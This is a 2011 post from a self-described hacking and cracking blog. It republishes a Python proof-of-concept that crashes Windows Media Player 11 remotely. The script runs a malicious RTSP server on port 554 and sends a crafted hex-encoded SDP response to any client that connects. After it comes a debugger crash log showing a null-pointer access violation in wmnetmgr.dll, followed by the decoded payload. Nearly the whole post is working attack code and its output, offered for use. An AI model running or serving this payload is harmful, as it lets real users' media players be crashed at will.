Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Tuesday, December 27, 2011

Browse » Home » , , , , , , , , , , » Windows Media Player 11.0.5721.5262 Denial Of Service

Windows Media Player 11.0.5721.5262 Denial Of Service


Microsoft Windows Media Player version 11.0.5721.5262 remote denial of service exploit.

import socket, binascii
print "\n" 
print "----------------------------------------------------------------"
print "|      WMP11 Remote Null Pointer                                |"
print "|      Level, Smash the Stack                                   |"
print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
print "----------------------------------------------------------------"
print "\n"
print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
HOST = "127.0.0.1"
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
buf = [
("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
"96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
"a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
"a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
"d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
"d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
"36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
"76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
"f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
"f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
"361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
"8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
"3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
"26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
"d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
"1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
"e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
"96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
"a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
"a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
"1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
"7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
"26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
"141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
"a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
"83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
"1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
"a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
"83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
"1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
"143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
"c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
"a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
"141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
"1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
"43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
"a0d0a")
]
while True:
conn, addr = s.accept()
print "-----Request From Client-----\n"
print conn.recv(1024)
print "-----Request From Client-----\n"
print "-----Response From Server-----\n"
print binascii.unhexlify(buf[0])
print "-----Response From Server-----\n"
conn.send(binascii.unhexlify(buf[0]))
conn.close()
s.close()
 
#CRASH
#(ae8.5b8): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
#0:021> g
#(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 
#PAYLOAD#
#RTSP/1.0 208 OK
#Content-Type: application/sdp
#Vary: Accept
#X-Playlist-Gen-Id: 176
#X-Broadcast-Id: 0
#Content-Length: 879
#Date: Sun, 08 May 2011 15:24:33 GMT
#CSeq: 1
#Server: WMServer/9.1.1.3841
#Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
#Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
#Etag: "168"
#Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
#v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
#s=c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
#BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
#nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
#nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
#BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
#BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
#AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
#AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
#A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable


THNKS...
You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.
Thanks YAHOO OR GMAIL

0 comments:

Post a Comment

 
Back to Top